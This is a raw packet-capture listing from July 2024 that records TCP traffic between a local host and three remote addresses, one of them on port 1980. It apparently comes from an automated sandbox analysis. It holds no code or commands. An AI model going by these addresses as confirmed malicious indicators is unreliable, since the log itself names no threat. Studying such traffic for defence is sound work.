                        Jul 1, 2024 13:58:02.663880110 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.663898945 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.663917065 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.663933039 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.663968086 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.663973093 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.663973093 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664001942 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664035082 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664048910 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664067984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664088011 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664102077 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664134979 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664144039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664144039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664169073 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664202929 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664211988 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664211988 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664237976 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664249897 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664267063 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664277077 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664300919 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664324045 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664335966 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664346933 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664371967 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664485931 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664520979 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664572001 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664609909 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664613962 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664644003 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664678097 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664710999 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664727926 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664745092 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664751053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664751053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664779902 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664813042 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664827108 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664827108 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664848089 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664880991 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664895058 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664916992 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664949894 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664983034 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.664988041 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.664988041 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665016890 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665050030 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665059090 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665082932 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665117025 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665123940 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665124893 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665150881 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665158033 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665184975 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665218115 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665250063 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665256023 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665256023 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665283918 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665292025 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665318012 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665333986 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665352106 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665385008 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665391922 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665391922 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665417910 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665442944 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665450096 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665483952 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.665515900 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.665544987 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702847004 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702872038 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702888966 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702909946 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702914953 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702914953 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702927113 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702927113 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702943087 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702960014 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702960014 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.702960014 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.702984095 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.703010082 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750577927 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750612974 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750648022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750663042 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750668049 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750715971 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750761986 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750765085 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750799894 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750833035 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750866890 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750875950 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750875950 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750919104 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750932932 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.750971079 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.750982046 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751003981 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751038074 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751058102 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751071930 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751106024 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751118898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751118898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751138926 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751152039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751171112 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751194000 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751204014 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751219034 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751241922 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751275063 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751283884 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751283884 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751308918 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751329899 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751344919 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751378059 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.751385927 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751385927 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.751445055 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:03.012415886 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:07.437000036 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:07.441890955 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:07.441993952 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:07.463877916 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:07.468790054 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:08.198676109 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:08.404202938 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:08.404321909 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:08.414777994 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:08.420444012 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:08.420511007 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:08.426033974 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:08.426107883 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:08.431008101 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.084008932 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.097647905 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:09.102540016 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.282632113 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.379453897 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:09.384288073 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.384377003 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:09.404755116 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:09.409598112 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:09.511660099 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:09.564189911 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:58:09.569144011 CEST8049167178.237.33.50192.168.2.22
                        Jul 1, 2024 13:58:09.569257975 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:58:09.588259935 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:58:09.593080997 CEST8049167178.237.33.50192.168.2.22
                        Jul 1, 2024 13:58:10.268301964 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.268413067 CEST8049167178.237.33.50192.168.2.22
                        Jul 1, 2024 13:58:10.268589973 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:58:10.300224066 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.305097103 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.346187115 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.346328974 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.355297089 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.360183001 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.361629009 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.368031025 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904563904 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904647112 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904699087 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.904701948 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904736996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904783010 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:10.904792070 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904828072 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:10.904879093 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.053550959 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.053589106 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.053628922 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.053637028 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.053683996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.053718090 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.053726912 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.054059982 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054110050 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.054152966 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054187059 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054222107 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054231882 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.054712057 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054745913 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054761887 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.054780960 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.054825068 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.178756952 CEST8049167178.237.33.50192.168.2.22
                        Jul 1, 2024 13:58:11.178838968 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:58:11.202053070 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202089071 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202122927 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202147007 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.202205896 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202236891 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202259064 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.202352047 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202400923 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.202408075 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202467918 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202502966 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202516079 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.202539921 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.202586889 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.203236103 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.203289986 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.203336954 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.203345060 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.203380108 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.203414917 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.203425884 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.204080105 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.204132080 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.204134941 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.204170942 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.204206944 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.204216003 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.223450899 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.290808916 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349003077 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349040985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349061966 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.349076033 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349123955 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.349153996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349188089 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349236012 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.349253893 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349287987 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349322081 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349332094 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.349358082 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349406958 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.349941015 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.349997997 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350032091 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350050926 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.350065947 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350107908 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.350281000 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.350409985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350501060 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350536108 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350543022 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.350606918 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350640059 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350649118 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.350692987 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350728035 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.350733042 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.351351023 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351394892 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.351406097 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351439953 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351481915 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.351491928 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351526976 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351560116 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351564884 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.351596117 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.351634979 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.352313995 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352370977 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352380991 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.352405071 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352448940 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.352458954 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352525949 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352559090 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.352566004 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.354501009 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.496400118 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.496468067 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.496535063 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.496550083 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.496571064 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.496629953 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.497073889 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497128010 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497178078 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.497181892 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497219086 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497251987 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497286081 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497296095 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.497493029 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497531891 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497545958 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.497570992 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497606993 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.497658014 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.497901917 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498008966 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498043060 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498058081 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.498080969 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498461962 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498509884 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.498514891 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498550892 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498593092 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.498617887 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498651028 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498683929 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.498706102 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.498718977 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499420881 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499454021 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499468088 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.499506950 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499538898 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499572992 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499586105 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.499609947 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499644041 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.499690056 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.501761913 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501818895 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501867056 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.501871109 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501905918 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501940012 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501974106 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.501985073 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.502176046 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502209902 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502244949 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502255917 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.502280951 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502628088 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502676010 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.502742052 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.502775908 CEST19804916680.85.154.121192.168.2.22
